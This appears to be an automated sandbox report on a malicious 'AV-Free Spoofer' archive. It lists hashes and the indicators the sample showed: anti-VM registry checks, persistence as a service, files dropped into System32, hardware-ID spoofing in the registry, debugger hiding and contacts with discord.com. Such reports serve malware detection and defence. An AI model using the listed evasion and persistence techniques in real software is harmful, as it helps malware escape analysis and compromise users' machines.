58dfb382f8cd93e1a396182d569afdb54d2cffda09c3ad2b96b11fb14010384c

Analysis

max time kernel
150s
max time network
147s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
03-12-2024 16:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

AV-Free Spoofer (1).rar
Size

8.5MB
MD5

e9db8de6465917b32c7c911df0bdf762
SHA1

807600ec249fa23dff95cef3a51025af06a98463
SHA256

58dfb382f8cd93e1a396182d569afdb54d2cffda09c3ad2b96b11fb14010384c
SHA512

4eab01c4bad11c3cd7dae37d5191690a0aec7f97776d03575957dc4e6776e5da5242f3a02b66bd44d179b02504d17f33f621b6581706876878e81ce03ca93c1b
SSDEEP

196608:7Mw14vzVwzvsL+zQ/cZve6lMfbbRslssV/YU:ArqzvsL+zQ0ZvmFOlYU

Score

9^/10

discovery evasion persistence themida trojan vmprotect

Malware Config

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

applecleaner.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	applecleaner.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

mp.exe

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\momiPUefmdBTMJUp\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\momiPUefmdBTMJUp"	mp.exe

Checks BIOS information in registry 2 TTPs 3 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

applecleaner.exe

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	applecleaner.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	applecleaner.exe
Set value (data)	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion = 64004f00300048005300200020002d002000310000000000	applecleaner.exe

Executes dropped EXE 3 IoCs

Processes:

AV-Free Spoofer.exemp.exeapplecleaner.exe

pid	Process
2756	AV-Free Spoofer.exe
492	mp.exe
1960	applecleaner.exe

Loads dropped DLL 4 IoCs

Processes:

7zFM.execmd.execmd.exe

pid	Process
2084	7zFM.exe
2712
1760	cmd.exe
2904	cmd.exe

Themida packer 7 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral1/files/0x000600000000549b-754.dat	themida
behavioral1/memory/1960-761-0x000000013FC70000-0x0000000140612000-memory.dmp	themida
behavioral1/memory/1960-759-0x000000013FC70000-0x0000000140612000-memory.dmp	themida
behavioral1/memory/1960-762-0x000000013FC70000-0x0000000140612000-memory.dmp	themida
behavioral1/memory/1960-763-0x000000013FC70000-0x0000000140612000-memory.dmp	themida
behavioral1/memory/1960-760-0x000000013FC70000-0x0000000140612000-memory.dmp	themida
behavioral1/memory/1960-1309-0x000000013FC70000-0x0000000140612000-memory.dmp	themida

VMProtect packed file 2 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
behavioral1/files/0x000c000000017447-6.dat	vmprotect
behavioral1/memory/2756-19-0x0000000140000000-0x000000014114F000-memory.dmp	vmprotect

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

applecleaner.exe

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	applecleaner.exe

Drops desktop.ini file(s) 6 IoCs

Processes:

applecleaner.exe

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\IQBL5G2Z\desktop.ini	applecleaner.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\YQ90JXIE\desktop.ini	applecleaner.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\History\History.IE5\desktop.ini	applecleaner.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\63WZ73PY\desktop.ini	applecleaner.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\7CO3PKGI\desktop.ini	applecleaner.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini	applecleaner.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

Processes:

flow	ioc
55	discord.com
56	discord.com
57	discord.com
59	discord.com

Checks system information in the registry 2 TTPs 1 IoCs

System information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

applecleaner.exe

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	applecleaner.exe

Drops file in System32 directory 5 IoCs

Processes:

AV-Free Spoofer.exe

description	ioc	Process
File created	C:\Windows\System32\dr.sys	AV-Free Spoofer.exe
File created	C:\Windows\System32\mp.exe	AV-Free Spoofer.exe
File created	C:\Windows\System32\applecleaner.exe	AV-Free Spoofer.exe
File created	C:\Windows\System32\freekey_check.txt	AV-Free Spoofer.exe
File created	C:\Windows\System32\windows11_check.txt	AV-Free Spoofer.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs

Processes:

AV-Free Spoofer.exe

pid	Process
2756	AV-Free Spoofer.exe
2756	AV-Free Spoofer.exe
2756	AV-Free Spoofer.exe
2756	AV-Free Spoofer.exe
2756	AV-Free Spoofer.exe
2756	AV-Free Spoofer.exe
2756	AV-Free Spoofer.exe
2756	AV-Free Spoofer.exe
2756	AV-Free Spoofer.exe
2756	AV-Free Spoofer.exe
2756	AV-Free Spoofer.exe
2756	AV-Free Spoofer.exe
2756	AV-Free Spoofer.exe
2756	AV-Free Spoofer.exe
2756	AV-Free Spoofer.exe
2756	AV-Free Spoofer.exe
2756	AV-Free Spoofer.exe
2756	AV-Free Spoofer.exe
2756	AV-Free Spoofer.exe
2756	AV-Free Spoofer.exe
2756	AV-Free Spoofer.exe
2756	AV-Free Spoofer.exe
2756	AV-Free Spoofer.exe
2756	AV-Free Spoofer.exe
2756	AV-Free Spoofer.exe
2756	AV-Free Spoofer.exe
2756	AV-Free Spoofer.exe
2756	AV-Free Spoofer.exe
2756	AV-Free Spoofer.exe
2756	AV-Free Spoofer.exe
2756	AV-Free Spoofer.exe
2756	AV-Free Spoofer.exe
2756	AV-Free Spoofer.exe
2756	AV-Free Spoofer.exe
2756	AV-Free Spoofer.exe
2756	AV-Free Spoofer.exe
2756	AV-Free Spoofer.exe
2756	AV-Free Spoofer.exe
2756	AV-Free Spoofer.exe
2756	AV-Free Spoofer.exe
2756	AV-Free Spoofer.exe
2756	AV-Free Spoofer.exe
2756	AV-Free Spoofer.exe
2756	AV-Free Spoofer.exe
2756	AV-Free Spoofer.exe
2756	AV-Free Spoofer.exe
2756	AV-Free Spoofer.exe
2756	AV-Free Spoofer.exe
2756	AV-Free Spoofer.exe
2756	AV-Free Spoofer.exe
2756	AV-Free Spoofer.exe
2756	AV-Free Spoofer.exe
2756	AV-Free Spoofer.exe
2756	AV-Free Spoofer.exe
2756	AV-Free Spoofer.exe
2756	AV-Free Spoofer.exe
2756	AV-Free Spoofer.exe
2756	AV-Free Spoofer.exe
2756	AV-Free Spoofer.exe
2756	AV-Free Spoofer.exe
2756	AV-Free Spoofer.exe
2756	AV-Free Spoofer.exe
2756	AV-Free Spoofer.exe
2756	AV-Free Spoofer.exe

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

IEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXE

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

Processes:

cmd.execmd.exe

pid	Process
904	cmd.exe
1400	cmd.exe

Enumerates system info in registry 2 TTPs 18 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

applecleaner.exe

description	ioc	Process
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral	applecleaner.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0	applecleaner.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier	applecleaner.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardManufacturer	applecleaner.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	applecleaner.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemBiosVersion	applecleaner.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	applecleaner.exe
Set value (str)	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier = "40e0b3ab-54c25c53-0"	applecleaner.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	applecleaner.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion	applecleaner.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral	applecleaner.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral	applecleaner.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardVersion	applecleaner.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	applecleaner.exe
Set value (str)	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier = "1c820d33-9820bd2a-5"	applecleaner.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardProduct	applecleaner.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	applecleaner.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BIOSVersion	applecleaner.exe

Kills process with taskkill 6 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	Process
1092	taskkill.exe
1688	taskkill.exe
892	taskkill.exe
3060	taskkill.exe
1712	taskkill.exe
2516	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 64 IoCs

adware spyware

Modify Registry

T1112

Processes:

iexplore.exeIEXPLORE.EXEiexplore.exeiexplore.exeIEXPLORE.EXEIEXPLORE.EXE

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{71B171D1-B193-11EF-9BF6-6AE4CEDF004B} = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "439405098"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\DOMStorage	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = d0ae1837a045db01	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\MINIE	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000aeca36b9f5e6f040855b915399a3b21d00000000020000000000106600000001000020000000f728176a84c4eac971a7c6994578cc94221a4cdede05839d23e5f5f06c3c57e8000000000e8000000002000020000000a87625c0eb4a4436f0ba6660bdd528d3e4e0f3b5df12e6b6aede99024264ec2b900000008d5da2391e4241693812309ce14f92e6e607c757d89d5c4924a48a2ed3ad488f2df5b6b6191299b83bc954b00954a242d119b9cc94c26ed0c7f4d6b82ebcbe2993270717cd0386fcc99cb94d4096c3f2d7e70b7d195f39bbf46128f3db94b271d94df2f2eac076e7021caaeaa524d200581a7aa254cc1dd52d15590bc74ddfee59f38ea7e2aada8f440c6d3e6dd4f5314000000032f80e3f4325165775c95082f598b0f4fa0bcf03c4fcd4508998cf97660bb52b4fd1659a385369cf909c3aa656502bdda96917275fc4e2820de507578e4401d5	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\DOMStorage\discord.com	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{A5455CF1-B193-11EF-9BF6-6AE4CEDF004B} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{71A0C831-B193-11EF-9BF6-6AE4CEDF004B} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\DOMStorage\discord.com\NumberOfSubdomains = "1"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000aeca36b9f5e6f040855b915399a3b21d0000000002000000000010660000000100002000000072e3144efd0f320711e577e56c18a506e86d2a7018692010eba6e125893ba628000000000e8000000002000020000000376185542c05db3f1d9e28af4ee7390281c1b764133fe35272bb21aa5df016ba200000007338c7c0e051319b05e528737506d17eef16722c8fe01ba212ca6d479f672e64400000004ef192085625ef738d1e55d0d946570636a47de180d8dead07d73968eca91f17590c4a547011a9467a359d694508938eb3f7b27bf98a3069396cc739c00e5acd	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

AV-Free Spoofer.exemp.exeapplecleaner.exe

pid	Process
2756	AV-Free Spoofer.exe
492	mp.exe
1960	applecleaner.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

7zFM.exe

pid	Process
2084	7zFM.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

mp.exe

pid	Process
492	mp.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

7zFM.exewhoami.exeWMIC.exeWMIC.exe

description	pid	Process
Token: SeRestorePrivilege	2084	7zFM.exe
Token: 35	2084	7zFM.exe
Token: SeSecurityPrivilege	2084	7zFM.exe
Token: SeSecurityPrivilege	2084	7zFM.exe
Token: SeSecurityPrivilege	2084	7zFM.exe
Token: SeDebugPrivilege	2752	whoami.exe
Token: SeIncreaseQuotaPrivilege	2836	WMIC.exe
Token: SeSecurityPrivilege	2836	WMIC.exe
Token: SeTakeOwnershipPrivilege	2836	WMIC.exe
Token: SeLoadDriverPrivilege	2836	WMIC.exe
Token: SeSystemProfilePrivilege	2836	WMIC.exe
Token: SeSystemtimePrivilege	2836	WMIC.exe
Token: SeProfSingleProcessPrivilege	2836	WMIC.exe
Token: SeIncBasePriorityPrivilege	2836	WMIC.exe
Token: SeCreatePagefilePrivilege	2836	WMIC.exe
Token: SeBackupPrivilege	2836	WMIC.exe
Token: SeRestorePrivilege	2836	WMIC.exe
Token: SeShutdownPrivilege	2836	WMIC.exe
Token: SeDebugPrivilege	2836	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2836	WMIC.exe
Token: SeRemoteShutdownPrivilege	2836	WMIC.exe
Token: SeUndockPrivilege	2836	WMIC.exe
Token: SeManageVolumePrivilege	2836	WMIC.exe
Token: 33	2836	WMIC.exe
Token: 34	2836	WMIC.exe
Token: 35	2836	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2836	WMIC.exe
Token: SeSecurityPrivilege	2836	WMIC.exe
Token: SeTakeOwnershipPrivilege	2836	WMIC.exe
Token: SeLoadDriverPrivilege	2836	WMIC.exe
Token: SeSystemProfilePrivilege	2836	WMIC.exe
Token: SeSystemtimePrivilege	2836	WMIC.exe
Token: SeProfSingleProcessPrivilege	2836	WMIC.exe
Token: SeIncBasePriorityPrivilege	2836	WMIC.exe
Token: SeCreatePagefilePrivilege	2836	WMIC.exe
Token: SeBackupPrivilege	2836	WMIC.exe
Token: SeRestorePrivilege	2836	WMIC.exe
Token: SeShutdownPrivilege	2836	WMIC.exe
Token: SeDebugPrivilege	2836	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2836	WMIC.exe
Token: SeRemoteShutdownPrivilege	2836	WMIC.exe
Token: SeUndockPrivilege	2836	WMIC.exe
Token: SeManageVolumePrivilege	2836	WMIC.exe
Token: 33	2836	WMIC.exe
Token: 34	2836	WMIC.exe
Token: 35	2836	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1476	WMIC.exe
Token: SeSecurityPrivilege	1476	WMIC.exe
Token: SeTakeOwnershipPrivilege	1476	WMIC.exe
Token: SeLoadDriverPrivilege	1476	WMIC.exe
Token: SeSystemProfilePrivilege	1476	WMIC.exe
Token: SeSystemtimePrivilege	1476	WMIC.exe
Token: SeProfSingleProcessPrivilege	1476	WMIC.exe
Token: SeIncBasePriorityPrivilege	1476	WMIC.exe
Token: SeCreatePagefilePrivilege	1476	WMIC.exe
Token: SeBackupPrivilege	1476	WMIC.exe
Token: SeRestorePrivilege	1476	WMIC.exe
Token: SeShutdownPrivilege	1476	WMIC.exe
Token: SeDebugPrivilege	1476	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1476	WMIC.exe
Token: SeRemoteShutdownPrivilege	1476	WMIC.exe
Token: SeUndockPrivilege	1476	WMIC.exe
Token: SeManageVolumePrivilege	1476	WMIC.exe
Token: 33	1476	WMIC.exe

Suspicious use of FindShellTrayWindow 7 IoCs

Processes:

7zFM.exeiexplore.exeiexplore.exeiexplore.exe

pid	Process
2084	7zFM.exe
2084	7zFM.exe
2084	7zFM.exe
2084	7zFM.exe
1656	iexplore.exe
2820	iexplore.exe
1288	iexplore.exe

Suspicious use of SetWindowsHookEx 17 IoCs

Processes:

iexplore.exeIEXPLORE.EXEiexplore.exeIEXPLORE.EXEiexplore.exeIEXPLORE.EXE

pid	Process
1656	iexplore.exe
1656	iexplore.exe
2368	IEXPLORE.EXE
2368	IEXPLORE.EXE
2820	iexplore.exe
2820	iexplore.exe
2432	IEXPLORE.EXE
2432	IEXPLORE.EXE
2432	IEXPLORE.EXE
2432	IEXPLORE.EXE
2820	iexplore.exe
2368	IEXPLORE.EXE
2368	IEXPLORE.EXE
1288	iexplore.exe
1288	iexplore.exe
788	IEXPLORE.EXE
788	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

7zFM.exeAV-Free Spoofer.execmd.execmd.execmd.exeiexplore.exeiexplore.execmd.execmd.exe

description	pid	Process	procid_target
PID 2084 wrote to memory of 2756	2084	7zFM.exe	30
PID 2084 wrote to memory of 2756	2084	7zFM.exe	30
PID 2084 wrote to memory of 2756	2084	7zFM.exe	30
PID 2756 wrote to memory of 2964	2756	AV-Free Spoofer.exe	32
PID 2756 wrote to memory of 2964	2756	AV-Free Spoofer.exe	32
PID 2756 wrote to memory of 2964	2756	AV-Free Spoofer.exe	32
PID 2964 wrote to memory of 2584	2964	cmd.exe	33
PID 2964 wrote to memory of 2584	2964	cmd.exe	33
PID 2964 wrote to memory of 2584	2964	cmd.exe	33
PID 2964 wrote to memory of 2580	2964	cmd.exe	34
PID 2964 wrote to memory of 2580	2964	cmd.exe	34
PID 2964 wrote to memory of 2580	2964	cmd.exe	34
PID 2964 wrote to memory of 2596	2964	cmd.exe	35
PID 2964 wrote to memory of 2596	2964	cmd.exe	35
PID 2964 wrote to memory of 2596	2964	cmd.exe	35
PID 2756 wrote to memory of 2848	2756	AV-Free Spoofer.exe	36
PID 2756 wrote to memory of 2848	2756	AV-Free Spoofer.exe	36
PID 2756 wrote to memory of 2848	2756	AV-Free Spoofer.exe	36
